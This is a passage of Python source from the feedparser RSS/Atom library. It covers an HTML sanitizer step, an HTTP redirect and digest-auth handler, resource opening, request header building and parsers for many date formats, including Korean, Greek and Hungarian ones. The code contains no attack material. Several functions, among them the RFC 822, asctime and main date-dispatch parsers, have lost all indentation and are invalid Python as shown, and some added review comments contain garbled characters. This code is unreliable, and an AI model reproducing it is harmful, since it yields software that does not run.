        match = re.compile(r'--[^>]*>').search(self.rawdata, i+4)
        if match:
            return match.end()
        # unclosed comment; deliberately fail to handle_data()
        return len(self.rawdata)
def _sanitizeHTML(htmlSource, encoding, _type):
    """Sanitize an HTML fragment, keeping only whitelisted markup.

    Fix: the CDATA-neutralizing replace had been corrupted into a no-op
    self-replacement; the intended '&lt;![CDATA[' escape is restored so
    CDATA contents are sanitized instead of passing through raw.
    """
    if not _SGML_AVAILABLE:
        return htmlSource
    p = _HTMLSanitizer(encoding, _type)
    htmlSource = htmlSource.replace('<![CDATA[', '&lt;![CDATA[')
    p.feed(htmlSource)
    data = p.output()
    data = data.strip().replace('\r\n', '\n')
    return data
class _FeedURLHandler(urllib2.HTTPDigestAuthHandler, urllib2.HTTPRedirectHandler, urllib2.HTTPDefaultErrorHandler):
    # urllib2 handler that records HTTP status on responses, follows
    # redirects, and retries basic-auth failures with digest auth.
    def http_error_default(self, req, fp, code, msg, headers):
        # The default implementation just raises HTTPError.
        # Forget that.
        fp.status = code
        return fp
    def http_error_301(self, req, fp, code, msg, hdrs):
        # Follow the redirect but annotate the result with the original
        # status code and the final URL.
        result = urllib2.HTTPRedirectHandler.http_error_301(self, req, fp,
                                                            code, msg, hdrs)
        result.status = code
        result.newurl = result.geturl()
        return result
    # The default implementations in urllib2.HTTPRedirectHandler
    # are identical, so hardcoding a http_error_301 call above
    # won't affect anything
    http_error_300 = http_error_301
    http_error_302 = http_error_301
    http_error_303 = http_error_301
    http_error_307 = http_error_301
    def http_error_401(self, req, fp, code, msg, headers):
        # Check if
        # - server requires digest auth, AND
        # - we tried (unsuccessfully) with basic auth, AND
        # If all conditions hold, parse authentication information
        # out of the Authorization header we sent the first time
        # (for the username and password) and the WWW-Authenticate
        # header the server sent back (for the realm) and retry
        # the request with the appropriate digest auth headers instead.
        # This evil genius hack has been brought to you by Aaron Swartz.
        host = urlparse.urlparse(req.get_full_url())[1]
        if base64 is None or 'Authorization' not in req.headers \
                          or 'WWW-Authenticate' not in headers:
            return self.http_error_default(req, fp, code, msg, headers)
        auth = _base64decode(req.headers['Authorization'].split(' ')[1])
        user, passw = auth.split(':')
        realm = re.findall('realm="([^"]*)"', headers['WWW-Authenticate'])[0]
        self.add_password(realm, host, user, passw)
        retry = self.http_error_auth_reqed('www-authenticate', host, req, headers)
        self.reset_retry_count()
        return retry
def _open_resource(url_file_stream_or_string, etag, modified, agent, referrer, handlers, request_headers):
    """URL, filename, or string --> stream

    This function lets you define parsers that take any input source
    (URL, pathname to local or network file, or actual data as a string)
    and deal with it in a uniform manner. Returned object is guaranteed
    to have all the basic stdio read methods (read, readline, readlines).
    Just .close() the object when you're done with it.

    If the etag argument is supplied, it will be used as the value of an
    If-None-Match request header.

    If the modified argument is supplied, it can be a tuple of 9 integers
    (as returned by gmtime() in the standard Python time module) or a date
    string in any format supported by feedparser. Regardless, it MUST
    be in GMT (Greenwich Mean Time). It will be reformatted into an
    RFC 1123-compliant date and used as the value of an If-Modified-Since
    request header.

    If the agent argument is supplied, it will be used as the value of a
    User-Agent request header.

    If the referrer argument is supplied, it will be used as the value of a
    Referer[sic] request header.

    If handlers is supplied, it is a list of handlers used to build a
    urllib2 opener.

    if request_headers is supplied it is a dictionary of HTTP request headers
    that will override the values generated by FeedParser.
    """
    # Anything that already looks like a stream is passed through as-is.
    if hasattr(url_file_stream_or_string, 'read'):
        return url_file_stream_or_string

    if isinstance(url_file_stream_or_string, basestring) \
       and urlparse.urlparse(url_file_stream_or_string)[0] in ('http', 'https', 'ftp', 'file', 'feed'):
        # Deal with the feed URI scheme
        if url_file_stream_or_string.startswith('feed:http'):
            # 'feed:http://...' -> 'http://...'
            url_file_stream_or_string = url_file_stream_or_string[5:]
        elif url_file_stream_or_string.startswith('feed:'):
            # 'feed://...' -> 'http://...'
            url_file_stream_or_string = 'http:' + url_file_stream_or_string[5:]
        if not agent:
            agent = USER_AGENT
        # Test for inline user:password credentials for HTTP basic auth
        auth = None
        if base64 and not url_file_stream_or_string.startswith('ftp:'):
            urltype, rest = urllib.splittype(url_file_stream_or_string)
            realhost, rest = urllib.splithost(rest)
            if realhost:
                user_passwd, realhost = urllib.splituser(realhost)
                if user_passwd:
                    # Strip the credentials out of the URL and carry them
                    # as a base64 Authorization payload instead.
                    url_file_stream_or_string = '%s://%s%s' % (urltype, realhost, rest)
                    auth = base64.standard_b64encode(user_passwd).strip()

        # iri support
        if isinstance(url_file_stream_or_string, unicode):
            url_file_stream_or_string = _convert_to_idn(url_file_stream_or_string)

        # try to open with urllib2 (to use optional headers)
        request = _build_urllib2_request(url_file_stream_or_string, agent, etag, modified, referrer, auth, request_headers)
        opener = urllib2.build_opener(*tuple(handlers + [_FeedURLHandler()]))
        opener.addheaders = [] # RMK - must clear so we only send our custom User-Agent
        try:
            return opener.open(request)
        finally:
            opener.close() # JohnD

    # try to open with native open function (if url_file_stream_or_string is a filename)
    try:
        return open(url_file_stream_or_string, 'rb')
    except (IOError, UnicodeEncodeError, TypeError):
        # if url_file_stream_or_string is a unicode object that
        # cannot be converted to the encoding returned by
        # sys.getfilesystemencoding(), a UnicodeEncodeError
        # will be thrown
        # If url_file_stream_or_string is a string that contains NULL
        # (such as an XML document encoded in UTF-32), TypeError will
        # be thrown.
        pass

    # treat url_file_stream_or_string as string
    if isinstance(url_file_stream_or_string, unicode):
        return _StringIO(url_file_stream_or_string.encode('utf-8'))
    return _StringIO(url_file_stream_or_string)
def _convert_to_idn(url):
    """Convert a URL to IDN notation"""
    # This function should only ever be called with a unicode string.
    # Strategy: if the host survives ASCII encoding it needs no
    # conversion; otherwise each dot-separated label is punycoded via
    # the 'idna' codec.
    pieces = list(urlparse.urlsplit(url))
    try:
        pieces[1].encode('ascii')
    except UnicodeEncodeError:
        host_port = pieces[1].rsplit(':', 1)
        port = u''
        if len(host_port) == 2:
            port = host_port.pop()
        encoded_labels = [label.encode('idna').decode('utf-8')
                          for label in host_port[0].split('.')]
        pieces[1] = '.'.join(encoded_labels)
        if port:
            pieces[1] += ':' + port
        return urlparse.urlunsplit(pieces)
    else:
        return url
def _build_urllib2_request(url, agent, etag, modified, referrer, auth, request_headers):
    """Build a urllib2.Request carrying feedparser's standard HTTP headers."""
    request = urllib2.Request(url)
    request.add_header('User-Agent', agent)
    if etag:
        request.add_header('If-None-Match', etag)
    if isinstance(modified, basestring):
        modified = _parse_date(modified)
    elif isinstance(modified, datetime.datetime):
        modified = modified.utctimetuple()
    if modified:
        # format into an RFC 1123-compliant timestamp. We can't use
        # time.strftime() since the %a and %b directives can be affected
        # by the current locale, but RFC 2616 states that dates must be
        # in English.
        weekday_names = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']
        month_names = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
        stamp = '%s, %02d %s %04d %02d:%02d:%02d GMT' % (
            weekday_names[modified[6]], modified[2],
            month_names[modified[1] - 1], modified[0],
            modified[3], modified[4], modified[5])
        request.add_header('If-Modified-Since', stamp)
    if referrer:
        request.add_header('Referer', referrer)
    # Advertise whichever decompressors were importable at module load.
    if gzip and zlib:
        request.add_header('Accept-encoding', 'gzip, deflate')
    elif gzip:
        request.add_header('Accept-encoding', 'gzip')
    elif zlib:
        request.add_header('Accept-encoding', 'deflate')
    else:
        request.add_header('Accept-encoding', '')
    if auth:
        request.add_header('Authorization', 'Basic %s' % auth)
    if ACCEPT_HEADER:
        request.add_header('Accept', ACCEPT_HEADER)
    # use this for whatever -- cookies, special headers, etc
    # [('Cookie','Something'),('x-special-header','Another Value')]
    for header_name, header_value in request_headers.items():
        request.add_header(header_name, header_value)
    request.add_header('A-IM', 'feed') # RFC 3229 support
    return request
def _parse_psc_chapter_start(start):
FORMAT = r'^((\d{2}):)?(\d{2}):(\d{2})(\.(\d{3}))?$'
m = re.compile(FORMAT).match(start)
if m is None:
return None
_, h, m, s, _, ms = m.groups()
h, m, s, ms = (int(h or 0), int(m), int(s), int(ms or 0))
return datetime.timedelta(0, h*60*60 + m*60 + s, ms*1000)
_date_handlers = []
def registerDateHandler(func):
'''Register a date handler function (takes string, returns 9-tuple date in GMT)'''
_date_handlers.insert(0, func)
# ISO-8601 date parsing routines written by Fazal Majid.
# The ISO 8601 standard is very convoluted and irregular - a full ISO 8601
# parser is beyond the scope of feedparser and would be a worthwhile addition
# to the Python library.
# A single regular expression cannot parse ISO 8601 date formats into groups
# as the standard is highly irregular (for instance is 030104 2003-01-04 or
# 0301-04-01), so we use templates instead.
# Please note the order in templates is significant because we need a
# greedy match.
_iso8601_tmpl = ['YYYY-?MM-?DD', 'YYYY-0MM?-?DD', 'YYYY-MM', 'YYYY-?OOO',
                'YY-?MM-?DD', 'YY-?OOO', 'YYYY',
                '-YY-?MM', '-OOO', '-YY',
                '--MM-?DD', '--MM',
                '---DD',
                'CC', '']
# Expand each template's placeholders (YYYY, MM, DD, OOO ordinal day,
# CC century) into named regex groups, and append an optional time /
# timezone suffix to every date pattern.
_iso8601_re = [
    tmpl.replace(
    'YYYY', r'(?P<year>\d{4})').replace(
    'YY', r'(?P<year>\d\d)').replace(
    'MM', r'(?P<month>[01]\d)').replace(
    'DD', r'(?P<day>[0123]\d)').replace(
    'OOO', r'(?P<ordinal>[0123]\d\d)').replace(
    'CC', r'(?P<century>\d\d$)')
    + r'(T?(?P<hour>\d{2}):(?P<minute>\d{2})'
    + r'(:(?P<second>\d{2}))?'
    + r'(\.(?P<fracsecond>\d+))?'
    + r'(?P<tz>[+-](?P<tzhour>\d{2})(:(?P<tzmin>\d{2}))?|Z)?)?'
    for tmpl in _iso8601_tmpl]
# Clean up loop variables leaked by the list comprehensions on Python 2;
# Python 3 comprehensions don't leak, hence the NameError guard.
try:
    del tmpl
except NameError:
    pass
# Pre-bound match methods, tried in order by _parse_date_iso8601.
_iso8601_matches = [re.compile(regex).match for regex in _iso8601_re]
try:
    del regex
except NameError:
    pass
def _parse_date_iso8601(dateString):
    '''Parse a variety of ISO-8601-compatible formats like 20040105'''
    # Try each precompiled template pattern in order; the template list
    # is ordered longest-first so the greediest match wins.
    m = None
    for _iso8601_match in _iso8601_matches:
        m = _iso8601_match(dateString)
        if m:
            break
    if not m:
        return
    if m.span() == (0, 0):
        # The empty-string template matched nothing useful.
        return
    params = m.groupdict()
    ordinal = params.get('ordinal', 0)
    if ordinal:
        ordinal = int(ordinal)
    else:
        ordinal = 0
    year = params.get('year', '--')
    if not year or year == '--':
        # Missing year defaults to the current year.
        year = time.gmtime()[0]
    elif len(year) == 2:
        # ISO 8601 assumes current century, i.e. 93 -> 2093, NOT 1993
        year = 100 * int(time.gmtime()[0] / 100) + int(year)
    else:
        year = int(year)
    month = params.get('month', '-')
    if not month or month == '-':
        # ordinals are NOT normalized by mktime, we simulate them
        # by setting month=1, day=ordinal
        if ordinal:
            month = 1
        else:
            month = time.gmtime()[1]
    month = int(month)
    day = params.get('day', 0)
    if not day:
        # see above
        if ordinal:
            day = ordinal
        elif params.get('century', 0) or \
                 params.get('year', 0) or params.get('month', 0):
            day = 1
        else:
            day = time.gmtime()[2]
    else:
        day = int(day)
    # special case of the century - is the first year of the 21st century
    # 2000 or 2001 ? The debate goes on...
    if 'century' in params:
        year = (int(params['century']) - 1) * 100 + 1
    # in ISO 8601 most fields are optional
    for field in ['hour', 'minute', 'second', 'tzhour', 'tzmin']:
        if not params.get(field, None):
            params[field] = 0
    hour = int(params.get('hour', 0))
    minute = int(params.get('minute', 0))
    second = int(float(params.get('second', 0)))
    # weekday is normalized by mktime(), we can ignore it
    weekday = 0
    daylight_savings_flag = -1
    tm = [year, month, day, hour, minute, second, weekday,
          ordinal, daylight_savings_flag]
    # ISO 8601 time zone adjustments: shift the local fields so the
    # resulting time is in GMT; mktime normalizes any overflow.
    tz = params.get('tz')
    if tz and tz != 'Z':
        if tz[0] == '-':
            tm[3] += int(params.get('tzhour', 0))
            tm[4] += int(params.get('tzmin', 0))
        elif tz[0] == '+':
            tm[3] -= int(params.get('tzhour', 0))
            tm[4] -= int(params.get('tzmin', 0))
        else:
            return None
    # Python's time.mktime() is a wrapper around the ANSI C mktime(3c)
    # which is guaranteed to normalize d/m/y/h/m/s.
    # Many implementations have bugs, but we'll pretend they don't.
    return time.localtime(time.mktime(tuple(tm)))
registerDateHandler(_parse_date_iso8601)
# 8-bit date handling routines written by ytrewq1.
# Korean date markers ("year", "month", "day", "AM", "PM") used by the
# OnBlog and Nate feed date formats below.
_korean_year  = u'\ub144' # b3e2 in euc-kr
_korean_month = u'\uc6d4' # bff9 in euc-kr
_korean_day   = u'\uc77c' # c0cf in euc-kr
_korean_am    = u'\uc624\uc804' # bfc0 c0fc in euc-kr
_korean_pm    = u'\uc624\ud6c4' # bfc0 c8c4 in euc-kr

# 'YYYY년 MM월 DD일 HH:MM:SS' (OnBlog)
_korean_onblog_date_re = \
    re.compile('(\d{4})%s\s+(\d{2})%s\s+(\d{2})%s\s+(\d{2}):(\d{2}):(\d{2})' % \
               (_korean_year, _korean_month, _korean_day))

# 'YYYY-MM-DD 오전|오후 H:M:S' (Nate, 12-hour clock)
_korean_nate_date_re = \
    re.compile(u'(\d{4})-(\d{2})-(\d{2})\s+(%s|%s)\s+(\d{,2}):(\d{,2}):(\d{,2})' % \
               (_korean_am, _korean_pm))
def _parse_date_onblog(dateString):
    '''Parse a string according to the OnBlog 8-bit date format'''
    match = _korean_onblog_date_re.match(dateString)
    if not match:
        return
    # Rebuild as W3DTF with the fixed +09:00 (KST) offset and delegate.
    w3dtfdate = '%(year)s-%(month)s-%(day)sT%(hour)s:%(minute)s:%(second)s%(zonediff)s' % {
        'year': match.group(1), 'month': match.group(2), 'day': match.group(3),
        'hour': match.group(4), 'minute': match.group(5), 'second': match.group(6),
        'zonediff': '+09:00',
    }
    return _parse_date_w3dtf(w3dtfdate)
registerDateHandler(_parse_date_onblog)
def _parse_date_nate(dateString):
    '''Parse a string according to the Nate 8-bit date format'''
    match = _korean_nate_date_re.match(dateString)
    if not match:
        return
    # Convert the 12-hour clock to a zero-padded 24-hour value.
    hour = int(match.group(5))
    if match.group(4) == _korean_pm:
        hour += 12
    hour = str(hour)
    if len(hour) == 1:
        hour = '0' + hour
    # Rebuild as W3DTF with the fixed +09:00 (KST) offset and delegate.
    w3dtfdate = '%(year)s-%(month)s-%(day)sT%(hour)s:%(minute)s:%(second)s%(zonediff)s' % {
        'year': match.group(1), 'month': match.group(2), 'day': match.group(3),
        'hour': hour, 'minute': match.group(6), 'second': match.group(7),
        'zonediff': '+09:00',
    }
    return _parse_date_w3dtf(w3dtfdate)
registerDateHandler(_parse_date_nate)
# Unicode strings for Greek date strings
# Maps abbreviated Greek month names (in several spelling variants) to
# their English RFC 822 equivalents.
_greek_months = \
  { \
   u'\u0399\u03b1\u03bd': u'Jan',       # c9e1ed in iso-8859-7
   u'\u03a6\u03b5\u03b2': u'Feb',       # d6e5e2 in iso-8859-7
   u'\u039c\u03ac\u03ce': u'Mar',       # ccdcfe in iso-8859-7
   u'\u039c\u03b1\u03ce': u'Mar',       # cce1fe in iso-8859-7
   u'\u0391\u03c0\u03c1': u'Apr',       # c1f0f1 in iso-8859-7
   u'\u039c\u03ac\u03b9': u'May',       # ccdce9 in iso-8859-7
   u'\u039c\u03b1\u03ca': u'May',       # cce1fa in iso-8859-7
   u'\u039c\u03b1\u03b9': u'May',       # cce1e9 in iso-8859-7
   u'\u0399\u03bf\u03cd\u03bd': u'Jun', # c9effded in iso-8859-7
   u'\u0399\u03bf\u03bd': u'Jun',       # c9efed in iso-8859-7
   u'\u0399\u03bf\u03cd\u03bb': u'Jul', # c9effdeb in iso-8859-7
   u'\u0399\u03bf\u03bb': u'Jul',       # c9f9eb in iso-8859-7
   u'\u0391\u03cd\u03b3': u'Aug',       # c1fde3 in iso-8859-7
   u'\u0391\u03c5\u03b3': u'Aug',       # c1f5e3 in iso-8859-7
   u'\u03a3\u03b5\u03c0': u'Sep',       # d3e5f0 in iso-8859-7
   u'\u039f\u03ba\u03c4': u'Oct',       # cfeaf4 in iso-8859-7
   u'\u039d\u03bf\u03ad': u'Nov',       # cdefdd in iso-8859-7
   u'\u039d\u03bf\u03b5': u'Nov',       # cdefe5 in iso-8859-7
   u'\u0394\u03b5\u03ba': u'Dec',       # c4e5ea in iso-8859-7
  }

# Maps abbreviated Greek weekday names to their English equivalents.
_greek_wdays = \
  { \
   u'\u039a\u03c5\u03c1': u'Sun', # caf5f1 in iso-8859-7
   u'\u0394\u03b5\u03c5': u'Mon', # c4e5f5 in iso-8859-7
   u'\u03a4\u03c1\u03b9': u'Tue', # d4f1e9 in iso-8859-7
   u'\u03a4\u03b5\u03c4': u'Wed', # d4e5f4 in iso-8859-7
   u'\u03a0\u03b5\u03bc': u'Thu', # d0e5ec in iso-8859-7
   u'\u03a0\u03b1\u03c1': u'Fri', # d0e1f1 in iso-8859-7
   u'\u03a3\u03b1\u03b2': u'Sat', # d3e1e2 in iso-8859-7
  }

# 'Wday, DD Mon YYYY HH:MM:SS zone' with Greek day/month names.
_greek_date_format_re = \
    re.compile(u'([^,]+),\s+(\d{2})\s+([^\s]+)\s+(\d{4})\s+(\d{2}):(\d{2}):(\d{2})\s+([^\s]+)')
def _parse_date_greek(dateString):
    '''Parse a string according to a Greek 8-bit date format.'''
    match = _greek_date_format_re.match(dateString)
    if not match:
        return
    # May raise KeyError for an unknown weekday/month name; the caller
    # (_parse_date) treats that as "this handler failed".
    wday = _greek_wdays[match.group(1)]
    month = _greek_months[match.group(3)]
    # Translate into an English RFC 822 date and delegate.
    rfc822date = '%(wday)s, %(day)s %(month)s %(year)s %(hour)s:%(minute)s:%(second)s %(zonediff)s' % {
        'wday': wday, 'day': match.group(2), 'month': month, 'year': match.group(4),
        'hour': match.group(5), 'minute': match.group(6), 'second': match.group(7),
        'zonediff': match.group(8),
    }
    return _parse_date_rfc822(rfc822date)
registerDateHandler(_parse_date_greek)
# Unicode strings for Hungarian date strings
# Maps Hungarian month names to zero-padded month numbers.
# NOTE(review): the keys u'febru\u00e1ri' and u'm\u00e1ujus' look like
# misspellings of the Hungarian month names ('februA!r', 'mA!jus') --
# confirm against real-world feed data before changing them.
_hungarian_months = \
  { \
    u'janu\u00e1r':   u'01',  # e1 in iso-8859-2
    u'febru\u00e1ri': u'02',  # e1 in iso-8859-2
    u'm\u00e1rcius':  u'03',  # e1 in iso-8859-2
    u'\u00e1prilis':  u'04',  # e1 in iso-8859-2
    u'm\u00e1ujus':   u'05',  # e1 in iso-8859-2
    u'j\u00fanius':   u'06',  # fa in iso-8859-2
    u'j\u00falius':   u'07',  # fa in iso-8859-2
    u'augusztus':     u'08',
    u'szeptember':    u'09',
    u'okt\u00f3ber':  u'10',  # f3 in iso-8859-2
    u'november':      u'11',
    u'december':      u'12',
  }

# 'YYYY-<monthname>-DDTHH:MM+ZZ:ZZ' with a Hungarian month name.
_hungarian_date_format_re = \
  re.compile(u'(\d{4})-([^-]+)-(\d{,2})T(\d{,2}):(\d{2})((\+|-)(\d{,2}:\d{2}))')
def _parse_date_hungarian(dateString):
    '''Parse a string according to a Hungarian 8-bit date format.'''
    match = _hungarian_date_format_re.match(dateString)
    if not match or match.group(2) not in _hungarian_months:
        return None
    month = _hungarian_months[match.group(2)]
    # Zero-pad single-digit day and hour fields.
    day = match.group(3)
    if len(day) == 1:
        day = '0' + day
    hour = match.group(4)
    if len(hour) == 1:
        hour = '0' + hour
    # Translate into W3DTF (keeping the original zone offset) and delegate.
    w3dtfdate = '%(year)s-%(month)s-%(day)sT%(hour)s:%(minute)s%(zonediff)s' % {
        'year': match.group(1), 'month': month, 'day': day,
        'hour': hour, 'minute': match.group(5),
        'zonediff': match.group(6),
    }
    return _parse_date_w3dtf(w3dtfdate)
registerDateHandler(_parse_date_hungarian)
# Named timezone abbreviations mapped to their offset from UTC in whole
# hours (US zones, UTC aliases, and a few single-letter military zones).
# Shared by _parse_date_w3dtf and _parse_date_rfc822.
timezonenames = {
    'ut': 0, 'gmt': 0, 'z': 0,
    'adt': -3, 'ast': -4, 'at': -4,
    'edt': -4, 'est': -5, 'et': -5,
    'cdt': -5, 'cst': -6, 'ct': -6,
    'mdt': -6, 'mst': -7, 'mt': -7,
    'pdt': -7, 'pst': -8, 'pt': -8,
    'a': -1, 'n': 1,
    'm': -12, 'y': 12,
}
# W3 date and time format parser
# http://www.w3.org/TR/NOTE-datetime
# Also supports MSSQL-style datetimes as defined at:
# http://msdn.microsoft.com/en-us/library/ms186724.aspx
# (basically, allow a space as a date/time/timezone separator)
def _parse_date_w3dtf(datestr):
    """Parse a W3C-DTF or MSSQL-style date string into a UTC 9-tuple.

    Returns None whenever the string cannot be interpreted.
    """
    if not datestr.strip():
        return None
    parts = datestr.lower().split('t')
    if len(parts) == 1:
        # This may be a date only, or may be an MSSQL-style date
        parts = parts[0].split()
        if len(parts) == 1:
            # Treat this as a date only
            parts.append('00:00:00z')
    elif len(parts) > 2:
        return None
    date = parts[0].split('-', 2)
    if not date or len(date[0]) != 4:
        return None
    # Ensure that `date` has 3 elements. Using '1' sets the default
    # month to January and the default day to the 1st of the month.
    date.extend(['1'] * (3 - len(date)))
    try:
        year, month, day = [int(i) for i in date]
    except ValueError:
        # `date` may have more than 3 elements or may contain
        # non-integer strings.
        return None
    if parts[1].endswith('z'):
        # Strip the trailing 'z' (UTC) and remember it as the zone field.
        parts[1] = parts[1][:-1]
        parts.append('z')
    # Append the numeric timezone offset, if any, to parts.
    # If this is an MSSQL-style date then parts[2] already contains
    # the timezone information, so `append()` will not affect it.
    # Add 1 to each value so that if `find()` returns -1 it will be
    # treated as False.
    loc = parts[1].find('-') + 1 or parts[1].find('+') + 1 or len(parts[1]) + 1
    loc = loc - 1
    parts.append(parts[1][loc:])
    parts[1] = parts[1][:loc]
    time = parts[1].split(':', 2)
    # Ensure that time has 3 elements. Using '0' means that the
    # minutes and seconds, if missing, will default to 0.
    time.extend(['0'] * (3 - len(time)))
    tzhour = 0
    tzmin = 0
    if parts[2][:1] in ('-', '+'):
        try:
            tzhour = int(parts[2][1:3])
            tzmin = int(parts[2][4:])
        except ValueError:
            return None
        if parts[2].startswith('-'):
            tzhour = tzhour * -1
            tzmin = tzmin * -1
    else:
        # Named zones (e.g. 'z', 'gmt') resolve through the shared table.
        tzhour = timezonenames.get(parts[2], 0)
    try:
        hour, minute, second = [int(float(i)) for i in time]
    except ValueError:
        return None
    # Create the datetime object and timezone delta objects
    try:
        stamp = datetime.datetime(year, month, day, hour, minute, second)
    except ValueError:
        return None
    delta = datetime.timedelta(0, 0, 0, 0, tzmin, tzhour)
    # Return the date and timestamp in a UTC 9-tuple
    try:
        return (stamp - delta).utctimetuple()
    except (OverflowError, ValueError):
        # IronPython throws ValueErrors instead of OverflowErrors
        return None
registerDateHandler(_parse_date_w3dtf)
def _parse_date_rfc822(date):
"""Parse RFC 822 dates and times
http://tools.ietf.org/html/rfc822#section-5
There are some formatting differences that are accounted for:
1. Years may be two or four digits.
2. The month and day can be swapped.
3. Additional timezone names are supported.
4. A default time and timezone are assumed if only a date is present.
"""
daynames = set(['mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun'])
months = {
'jan': 1, 'feb': 2, 'mar': 3, 'apr': 4, 'may': 5, 'jun': 6,
'jul': 7, 'aug': 8, 'sep': 9, 'oct': 10, 'nov': 11, 'dec': 12,
}
parts = date.lower().split()
if len(parts) < 5:
# Assume that the time and timezone are missing
parts.extend(('00:00:00', '0000'))
# Remove the day name
if parts[0][:3] in daynames:
parts = parts[1:]
if len(parts) < 5:
# If there are still fewer than five parts, there's not enough
# information to interpret this
return None
try:
day = int(parts[0])
except ValueError:
# Check if the day and month are swapped
if months.get(parts[0][:3]):
try:
day = int(parts[1])
except ValueError:
return None
else:
parts[1] = parts[0]
else:
return None
month = months.get(parts[1][:3])
if not month:
return None
try:
year = int(parts[2])
except ValueError:
return None
# Normalize two-digit years:
# Anything in the 90's is interpreted as 1990 and on
# Anything 89 or less is interpreted as 2089 or before
if len(parts[2]) <= 2:
year += (1900, 2000)[year < 90]
timeparts = parts[3].split(':')
timeparts = timeparts + ([0] * (3 - len(timeparts)))
try:
(hour, minute, second) = map(int, timeparts)
except ValueError:
return None
tzhour = 0
tzmin = 0
# Strip 'Etc/' from the timezone
if parts[4].startswith('etc/'):
parts[4] = parts[4][4:]
# Normalize timezones that start with 'gmt':
# GMT-05:00 => -0500
# GMT => GMT
if parts[4].startswith('gmt'):
parts[4] = ''.join(parts[4][3:].split(':')) or 'gmt'
# Handle timezones like '-0500', '+0500', and 'EST'
if parts[4] and parts[4][0] in ('-', '+'):
try:
tzhour = int(parts[4][1:3])
tzmin = int(parts[4][3:])
except ValueError:
return None
if parts[4].startswith('-'):
tzhour = tzhour * -1
tzmin = tzmin * -1
else:
tzhour = timezonenames.get(parts[4], 0)
# Create the datetime object and timezone delta objects
try:
stamp = datetime.datetime(year, month, day, hour, minute, second)
except ValueError:
return None
delta = datetime.timedelta(0, 0, 0, 0, tzmin, tzhour)
# Return the date and timestamp in a UTC 9-tuple
try:
return (stamp - delta).utctimetuple()
except (OverflowError, ValueError):
# IronPython throws ValueErrors instead of OverflowErrors
return None
# RFC 822 is the most common feed date format; register it.
registerDateHandler(_parse_date_rfc822)
_months = ['jan', 'feb', 'mar', 'apr', 'may', 'jun',
'jul', 'aug', 'sep', 'oct', 'nov', 'dec']
def _parse_date_asctime(dt):
"""Parse asctime-style dates"""
dayname, month, day, remainder = dt.split(None, 3)
# Convert month and day into zero-padded integers
month = '%02i ' % (_months.index(month.lower()) + 1)
day = '%02i ' % (int(day),)
dt = month + day + remainder
return time.strptime(dt, '%m %d %H:%M:%S %Y')[:-1] + (0, )
# asctime dates occasionally show up in feeds; register the handler.
registerDateHandler(_parse_date_asctime)
def _parse_date_perforce(aDateString):
    """parse a date in yyyy/mm/dd hh:mm:ss TTT format"""
    # Example: 'Fri, 2006/09/15 08:19:53 EDT'
    pattern = re.compile(
        r'(\w{,3}), (\d{,4})/(\d{,2})/(\d{2}) (\d{,2}):(\d{2}):(\d{2}) (\w{,3})')
    match = pattern.search(aDateString)
    if match is None:
        return None
    dow, year, month, day, hour, minute, second, tz = match.groups()
    month_names = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
    # Rewrite as an RFC 822 date so rfc822 can resolve the zone name.
    dateString = "%s, %s %s %s %s:%s:%s %s" % (dow, day, month_names[int(month) - 1], year, hour, minute, second, tz)
    tm = rfc822.parsedate_tz(dateString)
    if tm:
        return time.gmtime(rfc822.mktime_tz(tm))
registerDateHandler(_parse_date_perforce)
def _parse_date(dateString):
'''Parses a variety of date formats into a 9-tuple in GMT'''
if not dateString:
return None
for handler in _date_handlers:
try:
date9tuple = handler(dateString)
except (KeyError, OverflowError, ValueError):
continue
if not date9tuple:
continue
if len(date9tuple) != 9:
continue
return date9tuple
return None
# Each marker represents some of the characters of the opening XML
# processing instruction ('<?xm') in the specified encoding.
# (_l2bytes presumably builds a byte string from a list of byte values
# on both Python 2 and 3 -- defined earlier in this module.)
EBCDIC_MARKER = _l2bytes([0x4C, 0x6F, 0xA7, 0x94])
UTF16BE_MARKER = _l2bytes([0x00, 0x3C, 0x00, 0x3F])
UTF16LE_MARKER = _l2bytes([0x3C, 0x00, 0x3F, 0x00])
UTF32BE_MARKER = _l2bytes([0x00, 0x00, 0x00, 0x3C])
UTF32LE_MARKER = _l2bytes([0x3C, 0x00, 0x00, 0x00])

# Used to distinguish UTF-16 BOMs from UTF-32 data that shares a prefix.
ZERO_BYTES = _l2bytes([0x00, 0x00])

# Match the opening XML declaration.
# Example: <?xml version="1.0" encoding="utf-8"?>
RE_XML_DECLARATION = re.compile('^<\?xml[^>]*?>')

# Capture the value of the XML processing instruction's encoding attribute.
# Example: <?xml version="1.0" encoding="utf-8"?>
RE_XML_PI_ENCODING = re.compile(_s2bytes('^<\?.*encoding=[\'"](.*?)[\'"].*\?>'))
def convert_to_utf8(http_headers, data):
    '''Detect and convert the character encoding to UTF-8.

    http_headers is a dictionary
    data is a raw string (not Unicode)

    Returns a tuple (data, rfc3023_encoding, error): `data` re-encoded
    as UTF-8 when an encoding could be determined, the encoding actually
    used (u'' on failure), and either None or an exception instance
    describing a Content-Type / encoding problem.
    '''

    # This is so much trickier than it sounds, it's not even funny.
    # According to RFC 3023 ('XML Media Types'), if the HTTP Content-Type
    # is application/xml, application/*+xml,
    # application/xml-external-parsed-entity, or application/xml-dtd,
    # the encoding given in the charset parameter of the HTTP Content-Type
    # takes precedence over the encoding given in the XML prefix within the
    # document, and defaults to 'utf-8' if neither are specified. But, if
    # the HTTP Content-Type is text/xml, text/*+xml, or
    # text/xml-external-parsed-entity, the encoding given in the XML prefix
    # within the document is ALWAYS IGNORED and only the encoding given in
    # the charset parameter of the HTTP Content-Type header should be
    # respected, and it defaults to 'us-ascii' if not specified.

    # Furthermore, discussion on the atom-syntax mailing list with the
    # author of RFC 3023 leads me to the conclusion that any document
    # served with a Content-Type of text/* and no charset parameter
    # must be treated as us-ascii. (We now do this.) And also that it
    # must always be flagged as non-well-formed. (We now do this too.)

    # If Content-Type is unspecified (input was local file or non-HTTP source)
    # or unrecognized (server just got it totally wrong), then go by the
    # encoding given in the XML prefix of the document and default to
    # 'iso-8859-1' as per the HTTP specification (RFC 2616).

    # Then, assuming we didn't find a character encoding in the HTTP headers
    # (and the HTTP Content-type allowed us to look in the body), we need
    # to sniff the first few bytes of the XML data and try to determine
    # whether the encoding is ASCII-compatible. Section F of the XML
    # specification shows the way here:
